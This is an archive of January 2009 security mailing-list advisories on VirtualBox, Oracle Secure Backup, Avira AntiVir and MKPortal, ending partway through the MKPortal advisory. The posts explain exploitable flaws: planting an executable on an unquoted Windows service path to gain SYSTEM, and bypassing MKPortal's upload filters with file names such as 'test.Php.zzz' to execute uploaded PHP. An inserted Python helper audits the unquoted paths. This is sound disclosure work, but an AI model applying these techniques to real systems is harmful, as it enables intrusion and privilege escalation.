Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LNHyf-0003Cq-39@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:011
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : virtualbox
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in VirtualBox,
 affecting versions prior to 2.0.6, which allows local users
 to overwrite arbitrary files via a symlink attack on a
 /tmp/.vbox-qateam-ipc/lock temporary file (CVE-2008-5256).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5256
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0faad982e37288846205d6d33d590ee1  2008.0/i586/dkms-vboxadd-1.5.0-6.1mdv2008.0.i586.rpm
 ec69afc3908bd606bae77b8422e39558  2008.0/i586/dkms-vboxvfs-1.5.0-6.1mdv2008.0.i586.rpm
 c27d1bd07d9dc67f4cefbdf33472acca  2008.0/i586/dkms-virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 9964702ee96bcf6c6edf0c31835d20e7  2008.0/i586/virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 435eb23fb1847074783ee59f21afa05d  2008.0/i586/virtualbox-guest-additions-1.5.0-6.1mdv2008.0.i586.rpm
 dbf4cd4d51e6690ed54a01751d7eb6e3  2008.0/i586/x11-driver-input-vboxmouse-1.5.0-6.1mdv2008.0.i586.rpm
 89984e4e53d3eda593e1a384b97acd14  2008.0/i586/x11-driver-video-vboxvideo-1.5.0-6.1mdv2008.0.i586.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 0bfb5b9d8c8a16f1e04fd490e6379e63  2008.0/x86_64/dkms-virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm
 3bc3251552c50c2ba8270a69c5f353d7  2008.0/x86_64/virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 c4e028f64685550f1b54d658cac8033c  2008.1/i586/dkms-vboxadd-1.5.6-1.1mdv2008.1.i586.rpm
 0ba02b82975789a2e074562c266e3880  2008.1/i586/dkms-vboxvfs-1.5.6-1.1mdv2008.1.i586.rpm
 91fb1e876d76370c40f2bc20271dcdbb  2008.1/i586/dkms-virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 42dd201c14fab3dd1ff218969f88612c  2008.1/i586/virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 5feeef63896de6093cdd6365258df60d  2008.1/i586/virtualbox-guest-additions-1.5.6-1.1mdv2008.1.i586.rpm
 3d3fc94cb178e2a6853679f01f7f4198  2008.1/i586/x11-driver-input-vboxmouse-1.5.6-1.1mdv2008.1.i586.rpm
 79b78be2abe7b3a6d8e95d547139afa4  2008.1/i586/x11-driver-video-vboxvideo-1.5.6-1.1mdv2008.1.i586.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4d261638ff0134079fa6c52d0a368664  2008.1/x86_64/dkms-virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm
 6ccec4ff2f35d1308f73e10679651ce0  2008.1/x86_64/virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 53e13912d97abe5b7044887eab1028fd  2009.0/i586/dkms-vboxadd-2.0.2-2.1mdv2009.0.i586.rpm
 9441661b095cf9c65c50c3a81f1fb89b  2009.0/i586/dkms-vboxvfs-2.0.2-2.1mdv2009.0.i586.rpm
 2977fa2971f66d6b554ab73f03b80ba6  2009.0/i586/dkms-virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 acddf8b8a168c148f1f5e7a548a610bd  2009.0/i586/virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 edfc2bc624a87ab96f238345fbe38529  2009.0/i586/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.i586.rpm
 e3650d3c5fedb2dccdc4a2e108414b95  2009.0/i586/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.i586.rpm
 6d28714532427680f82c86fe34fee3e0  2009.0/i586/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.i586.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 667f19d7803c5eb163364ce221b367be  2009.0/x86_64/dkms-vboxadd-2.0.2-2.1mdv2009.0.x86_64.rpm
 e4439eb5b8a5ef7e09924989058a69b8  2009.0/x86_64/dkms-vboxvfs-2.0.2-2.1mdv2009.0.x86_64.rpm
 3da3bc075de10484211b0da29a0a14cc  2009.0/x86_64/dkms-virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 1aba902daf9019cbcf4e62e8a64d0a82  2009.0/x86_64/virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 da486be54760b618a3d84e23c3ad067e  2009.0/x86_64/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.x86_64.rpm
 a3adf7c94132553f43dc6a0cd765bcc8  2009.0/x86_64/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.x86_64.rpm
 ca82cc1b8e6b5d85d1a7601a37367562  2009.0/x86_64/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.x86_64.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

From - Thu Jan 15 12:02:18 2009
Date: Thu, 15 Jan 2009 06:46:51 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: secalert_us@oracle.com, CVE <cve@mitre.org>
Subject: Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup
 Administration Server login.php Command Injection Vulnerability
In-Reply-To: <496D256A.5090502@idefense.com>
Message-ID: <Pine.LNX.4.64.0901150641440.28002@forced.attrition.org>
References: <496D256A.5090502@idefense.com>


iDefense, CVE or Oracle;

The two iDefense advisories present a bit of confusion over the CVE 
assignments and number of vulnerabilities. There appear to be two 
vulnerabilities (login.php and common.php) that may have 3 CVE numbers 
assigned. Could anyone clarify?

First advisory, mail list post and original jibe suggesting common.php 
issue is CVE-2008-5449:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0111.html
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv9
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.


Second advisory, mail list post and original do not match, mentioning 
CVE-2008-4006 and then CVE-2008-5448 for what appear to be login.php and 
common.php. This implies that common.php may have had two CVE assigned:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0110.html
The first vulnerability is in "php/login.php".
The second vulnerability is in "php/common.php". 
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-4006 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv8
The first vulnerability is in "php/login.php". 
The second vulnerability is in "php/common.php".
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
names CVE-2008-4006 and CVE-2008-5448 to this issue. 


Any clarification would be appreciated.

From - Thu Jan 15 12:12:18 2009
Message-Id: <200901150921.n0F9LdUw025523@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:24:48 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup Multiple Denial Of Service vulnerabilities

From - Thu Jan 15 12:22:18 2009
Message-Id: <200901150922.n0F9MotF026221@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:25:58 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup's observiced.exe Denial Of Service vulnerability

From - Thu Jan 15 12:32:18 2009
Message-Id: <200901150923.n0F9NbJp026543@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:26:45 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability

From - Thu Jan 15 12:42:18 2009
Message-ID: <496F326E.7050206@algroup.co.uk>
Date: Thu, 15 Jan 2009 12:56:14 +0000
From: Adam Laurie <adam@algroup.co.uk>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: ANNOUNCE: apache_1.3.41+ssl_1.60 released

 From CHANGES.SSL:

Changed with Apache-SSL 1.3.41/1.60

   *) For some reason I switched on renegotiation, which broke
      things. For now, switched back off.
      [Ben Laurie]

The release will take a while to find its way to mirrors, which can 
themselves be found here:

http://www.apache-ssl.org/

cheers,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 20 7993 2690
Suite 117                           Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton
Surrey                              mailto:adam@algroup.co.uk
KT6 4JX                             http://rfidiot.org

From - Thu Jan 15 12:52:18 2009
Date: Thu, 15 Jan 2009 16:13:07 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
Message-ID: <1734516223.20090115161307@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<vuln@secunia.com>, <cert@cert.org>, <nvd@nist.gov>, <cve@mitre.org>,
<vulndb@securityfocus.com>
Subject: Errata: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference

Errata :

Products listed but not affected :
AVIRA WebProtector for KEN! - Reason: Does not use the Scan Engine
Avira AntiVir Mobile - Reason: Does not use the same AV Engine

Avira requested the following products to be removed from the list,
for the reason that they are license models and not products per se,
it is arguable whether they should be listed or not, since the
licenses (most likely) include the vulnerable products:

AVIRA WebGate Suite - Reason: is a License Model
AVIRA SmallBusiness Suite -> Reason: is a License Model
AVIRA Business Bundle -> Reason: is a License Model
AVIRA AntiVir NetWork Bundle -> Reason: is a License Model
AVIRA AntiVir NetGate Bundle -> Reason: is a License Model
AVIRA AntiVir GateWay Bundle -> Reason: is a License Model
AVIRA AntiVir Campus (for Education) -> Reason: is a License Model

List of undisputed affected products :

Avira AntiVir Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
Avira AntiVir Domino
Avira AntiVir WebGate
Avira WebGate Suite
Avira AntiVir ISA Server
Avira AntiVir MIMEsweeper



______________________________________________________________________

     Avira - RAR -Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira AntiVir Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices has not been
tested nor confirmed to exist, there is however reason to believe
that the flaw existed in these products as well.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being used by private users a million times over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a RAR archive an attacker
might trigger division by zero and null pointer exceptions. The attack
vector should be rated as remote as an attachment to an e-mail is enough.

*Anybody else noticed that the amount of details in most
advisories have become less than useful?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the impact is a Denial of Service condition, in
others an invalid read size of 4 bytes, which again in some
cases leads to a null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The vulnerability notification policy I adhere to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

 
17/12/2008 : Sent notice to the correct mail address
security@avira. com

17/12/2008 : Avira acknowledges receipt

17/12/2008 : Avira sends details of the root cause on the same
day "The crash occurs in a heavily corrupted, generated RAR
archive while extracting the contents of the 22nd file. We can't
give any file names as they are non-printable characters."

13/01/2009 : Avira notifies me that the issue was fixed with an
update that shipped with AVPack 8.1.3.5 on the 09/01/2009

14/01/2009 : Avira states that all products have been affected
except "Security Management Center" and the "Internet Update
Manager". "That basically means really all products, except
products such as the Security Management Center or the Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

From - Thu Jan 15 15:42:48 2009
Date: Thu, 15 Jan 2009 18:43:00 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
Message-ID: <151212550.20090115184300@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-2] Avira Antivir - Priviledge escalation

___________________________________________________________________

From  the 'cover-your-basics' and from the 'they-still-exist-department'
   Antivir insecure CreateProcess() usage - Privilege Escalation
                 and autostart as free bonus
___________________________________________________________________

Reference     : [TZO-2009-2]-Avira Antivir Privilege escalation
WWW           : http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html
Product       : AV7/AV8 desktop products :
                - Avira AntiVir Premium
                - Avira Premium Security Suite
                - Avira AntiVir Professional
Vendor        : http://www.avira.de


I. Background
~~~~~~~~~~~~~
Avira AntiVir is a reliable  free  antivirus  solution,   that
constantly and  rapidly  scans  your  computer  for  malicious
programs such as viruses, Trojans, backdoor programs,  hoaxes,
worms, dialers etc. Monitors  every  action  executed  by  the
user or the  operating  system  and  reacts  promptly  when  a
malicious program is detected.

The  protection  experts  have  numerous  company    locations
throughout  Germany  and  cultivate  partnerships  in  Europe,
Asia and America. Avira has more than 180 employees  at  their
main office in Tettnang near Lake  Constance  and  is  one  of
the largest employers in the region.   There  are  around  250
people employed  worldwide  whose  commitment  is  continually
being confirmed by  awards.   A  significant  contribution  to
protection is the Avira AntiVir Personal which is  being  used
by private users a million times over.

AV-Comparatives e.V. have  chosen  Avira  AntiVir  Premium  as
the best anti-virus solution of 2008 


II. Description
~~~~~~~~~~~~~~~
No funky IOCTL just a plain unsafe call to CreateProcess().
In detail, the scheduler (sched.exe) running with SYSTEM
privileges calls the CreateProcess() API without enclosing
lpCommandLine in quotes to _regularly_ shell avwsc.exe

Calling an executable with a path that has spaces in it and not
using quotes will trigger Windows to search for the
executable in various areas.

Calling for instance -  

 CreateProcess(
  NULL,
  c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe,
  ...
  );
   
will first look for
c:\program.exe
and then
c:\program files\avira\antivir.exe

This is documented and intended behaviour as can be seen at : 
http://msdn.microsoft.com/en-us/library/ms682425.aspx

Quoting ms682425.aspx : 
The lpApplicationName parameter can be NULL. In that case,  
the module name must be the first white space-delimited
token in the lpCommandLine string. If you  are  using  a  long
file name that  contains  a  space,   use  quoted  strings  to
indicate where the file name ends  and  the  arguments  begin;
otherwise, the file name is ambiguous. For example,   consider
the string  "c:\program  files\sub  dir\program  name".   This
string can be interpreted in a number  of  ways.   The  system
tries to interpret the possibilities in the  following  order:


c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
c:\program files\sub dir\program name.exe

Pre-conditions for a CreateProcess() call to be insecure :
- lpApplicationName contains a NULL 
- the path in lpCommandLine contains white space 
- the path in lpCommandLine is not enclosed in quotation marks

III. Impact
~~~~~~~~~~~
- Elevation of privileges from USER to SYSTEM  is  possible  
by  writing the payload  to c:\program files\avira\antivir.exe    
- Autostart vector - The payload will be executed even  after 
a reboot

IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
28/09/2008 : Contacted and sent bug report to Avira
28/09/2008 : Avira acknowledges receipt
01/10/2008 : Avira notifies me that the issue will be fixed 
             with their next Emergency Update (EU2)
24/10/2008 : The update is pushed to customers
24/10/2008 : Avira notifies me that credits have been posted 
here: http://www1.avira.com/en/support/faq/details.html?id=419             
15/01/2009 : Release of this advisory


References :
[1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
[2] CreateProcess() - http://msdn.microsoft.com/en-us/library/ms682425.aspx
[3] Book: Fuzzing - Brute force vulnerability discovery
[4] Loadlibrary() -  http://msdn.microsoft.com/en-us/library/ms684175(VS.85).aspx
If the string does not specify a path, the function uses a standard search strategy to find the file.
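
Added example (not part of the advisory; all function names are illustrative): a Python audit helper that applies the interpretation order quoted from ms682425.aspx above to any lpCommandLine and returns the paths that would be tried before the intended executable, so those locations can be checked for write access by unprivileged users. It covers the general rule, of which the Avira call is one instance.

```python
import ntpath
import re

# Illustrative helper names; this is not Avira or Microsoft code.


def search_order(command_line):
    """Paths tried, in order, when lpApplicationName is NULL."""
    cmd = command_line.strip()
    if not cmd:
        return []
    if cmd.startswith('"'):
        # Quoted module name: exactly one interpretation.
        end = cmd.find('"', 1)
        return [cmd[1:end] if end != -1 else cmd[1:]]
    # Unquoted: every run of white space is a possible end of the file name.
    cut_points = [m.start() for m in re.finditer(r"\s+", cmd)] + [len(cmd)]
    candidates = []
    for cut in cut_points:
        prefix = cmd[:cut]
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"  # no extension on the last component
        candidates.append(prefix)
    return candidates


def earlier_candidates(application_name, command_line, intended_exe):
    """Paths that would run instead of intended_exe if a file existed there."""
    if application_name is not None:
        return []  # lpApplicationName set: module name is not parsed this way
    earlier = []
    for candidate in search_order(command_line):
        if candidate.lower() == intended_exe.lower():
            return earlier
        earlier.append(candidate)
    raise ValueError("intended_exe is not one of the interpretations")


# Command line from the advisory.
AVIRA = r"c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe"

if __name__ == "__main__":
    for path in earlier_candidates(None, AVIRA, AVIRA):
        print("verify not writable by unprivileged users:", path)
    # Quoting the path removes every earlier interpretation.
    print(earlier_candidates(None, '"' + AVIRA + '"', AVIRA))
```

The system stops at the first interpretation that exists on disk, so only the entries before the intended executable matter for review.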


Date: Thu, 15 Jan 2009 11:43:55 -0700
From: come2waraxe@yahoo.com
To: bugtraq@securityfocus.com
Subject: [waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
=============================================================================
Author: Janek Vind "waraxe"
Date: 15. January 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-70.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MKPortal is a free Portal/Content Management System (CMS) which seamlessly
integrates with the most popular forum softwares. It uses the forum user
management system and other features and adds many powerful modules to create
and manage a light but powerful web site. MKPortal has an intuitive user
interface and is very simple to install and administer.

Homepage: http://www.mkportal.it/


List of found vulnerabilities
==============================================================================
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

Registered users with blog keeping privileges can access personal gallery
functionality, example URL:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal

They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452: 

---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;

..
$file =  $_FILES['FILE_UPLOAD']['tmp_name'];
$file_name =  $_FILES['FILE_UPLOAD']['name'];
//$file_type =  $_FILES['FILE_UPLOAD']['type'];
$peso =  $_FILES['FILE_UPLOAD']['size'];

if (!$file) {
$message = "{$mklib->lang['b_compfile']}";
$mklib->error_page($message);
exit;
}

//Validate file extension
$file_ext = preg_replace("`.*\.(.*)`", "\\1", $file_name);
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);

switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
case 'png':
$ext = 'png';
break;
case 'tif':
$ext = 'tif';
break;
case 'bmp':
$ext = 'bmp';
break;
default:
$ext = 'not_supported';
break;
}
if ($ext == "not_supported")  {
$message = "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

--------------------[/source code]---------------------

So this piece of code is supposed to let in only files with specific extensions.
In reality it will pass through files like "foobar.agif" or "whatever.pbmp" ...
Let's assume that we have a jpg picture named "pic.php.jjpg". This can be a valid
picture file and at the same time contain malicious php code inside.

What happens next:

---------------------[source code]---------------------
//Move file from server tmp directory to blog "tmp" directory
if (!move_uploaded_file("$file", "mkportal/blog/images/tmp/$file_name")) {
$message = "{$mklib->lang['b_nopermupl']}";
$mklib->error_page($message);
exit;
}
@chmod("mkportal/blog/images/tmp/$file_name", 0644);

//Validate by mime type
$tmpfilename = "mkportal/blog/images/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
--------------------[/source code]---------------------

As this image file is a perfectly normal jpg picture, it will pass
"getimagesize()" successfully. And "chmod()" will not make any difference in
this specific situation.

Next:

---------------------[source code]---------------------
$file_type = $size['mime'];

if (!$mklib->check_attach($file_type, $file_ext))  {
//Delete invalid file and display error
@unlink($tmpfilename);
$message .= "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

//Validate by file contents
$fcontents = file_get_contents ($tmpfilename);
$carray = array("html", "javascript", "vbscript", "alert",
 "onmouseover", "onclick", "onload", "onsubmit");
foreach ($carray as $fch) {
             if (strstr($fcontents, $fch)) {
                 @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
                 exit;
             }
         }
         if (preg_match("#script(.+?)/script#ies", $fcontents)) {
            @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
             exit;
}
--------------------[/source code]---------------------

Again, MIME-type will be correct and html-code detection can't stop
malicious php code inside of that jpg file. 

Finally:

---------------------[source code]---------------------
$image = $totr.$file_name;

//move file from "tmp" directory to "images" directory
@rename($tmpfilename, "mkportal/blog/images/$image");
--------------------[/source code]---------------------

What are the possibilities? An attacker can upload a picture file with php code
inside with a filename like "pic.php.pjpg" and it will be stored on the remote
server as a result. And when the attacker issues a direct request to the uploaded
picture:

http://localhost/mkportal.1.2.1/mkportal/blog/images/1pic.php.pjpg

.. then in case of Apache webserver the php code inside of the picture will
be executed. Therefore it's basically remote php code execution.


2. Insecure file upload in Downloads module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user

Registered users can add new files in downloads module by default:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=submit_file

Let's look at "mkportal/modules/Downloads/index.php" line ~662:

---------[source code]--------------------------
function add_file() {

     global $mkportals, $DB,  $_FILES, $mklib, $mklib_board;
..
//Replace illegal sub-extensions
$com_types = array('com', 'exe', 'bat', 'scr', 'pif', 'asp',
 'cgi', 'pl', 'php');
foreach ($com_types AS $bad) {
$file_name = str_replace(".$bad", "_$bad", $file_name);
---------[/source code]--------------------------

At first look this seems to be a good security measure. If we try to upload a
trojanized file with php code inside named "test.php.zzz", then it will be
transformed to "test_php.zzz" and php code execution is not possible.
But wait a minute ... "str_replace()" is case sensitive, right? So, what if
we try to upload "test.Php.zzz"? Yes, the code fragment above will not trigger and
we end up with a potentially dangerous uploaded file on the remote server. It's easy
to find out the URL to that file. First, let's look at the file's download link:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=download_file&ide=3&file=test.Php.zzz

Here we can determine, that "ide=3". And this is the direct file request URL:

http://localhost/mkportal.1.2.1/mkportal/modules/downloads/file/mk_3_test.Php.mk

And it appears, that Apache does not care, if it's "php" or "Php" or "PHP", it
will parse the file as php script anyway. And as result any registered user with
file adding rights in downloads block can have arbitrary php code execution
possibilities in remote server.


3. Race condition in multiple modules file upload functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
